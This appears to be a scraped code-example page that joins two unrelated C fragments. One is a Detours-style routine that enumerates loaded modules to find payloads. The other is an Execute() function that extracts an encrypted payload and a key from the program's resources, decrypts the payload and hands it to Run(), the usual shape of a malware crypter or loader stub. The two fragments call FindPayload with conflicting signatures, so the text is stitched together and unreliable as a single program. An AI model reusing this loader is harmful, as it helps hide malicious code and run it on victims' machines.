示例#1
0
int WINAPI WinMain(HINSTANCE hinst, HINSTANCE hprev, LPSTR lpszCmdLine, int nCmdShow)
{
    (void)hinst;
    (void)hprev;
    (void)lpszCmdLine;
    (void)nCmdShow;

    printf("Source .EXE:\n");
    FindPayload(NULL);
    printf("\n");

    printf("DLL and EXE binaries loaded:\n");

    EDll1Function();
    EDll2Function();
    EDll3Function();

    for (HINSTANCE hiter = NULL; (hiter = DetourEnumerateModules(hiter)) != NULL;) {
        FindPayload(hiter);
    }

    if ((PVOID)hinst == (PVOID)lpszCmdLine) {
        DispatchMessage(NULL);                          // Force load of gdi32.dll
    }

    return 0;
}
BOOL Execute(void) {
	PRINT_INFO("Retrieving payload resource.\n");
	LPVOID lpPayload = NULL;
	SIZE_T nPayloadSize = 0;
	if (!FindPayload(&lpPayload, &nPayloadSize, RES_ID_PAYLOAD)) {
		return FALSE;
	}

	PRINT_INFO("Allocating payload buffer for decryption.\n");
	LPVOID lpDecryptPayload = MyHeapAlloc(nPayloadSize);
	if (!lpDecryptPayload) {
		PRINT_ERROR(
			"Failed to allocate buffer: <0x%08x>\n",
			GetLastError()
		);
		return FALSE;
	}
	memcpy(lpDecryptPayload, lpPayload, nPayloadSize);

	PRINT_INFO("Retrieving key resource.\n");
	LPBYTE lpKey = NULL;
	SIZE_T nKeySize = 0;
	if (!FindPayload(&lpKey, &nKeySize, RES_ID_KEY)) {
		return FALSE;
	}

	PRINT_INFO("Extracted key:\n");
	for (SIZE_T i = 0; i < nKeySize;) {
		for (int j = 0; j < 16; j++) {
			if (j == 8) {
				PrintColour(CONSOLE_PURPLE, "  ");
			}
			PrintColour(CONSOLE_PURPLE, "%02x ", lpKey[i + j]);
		}
		puts("");
		i += 16;
	}

	PRINT_INFO("Decrypting payload.\n");
	DecryptPayload(lpDecryptPayload, nPayloadSize, lpKey, nKeySize);

	BOOL bRet = Run(lpDecryptPayload, nPayloadSize);

	// Deallocate decrypted payload.
	MyHeapFree(lpDecryptPayload);

	return bRet;
}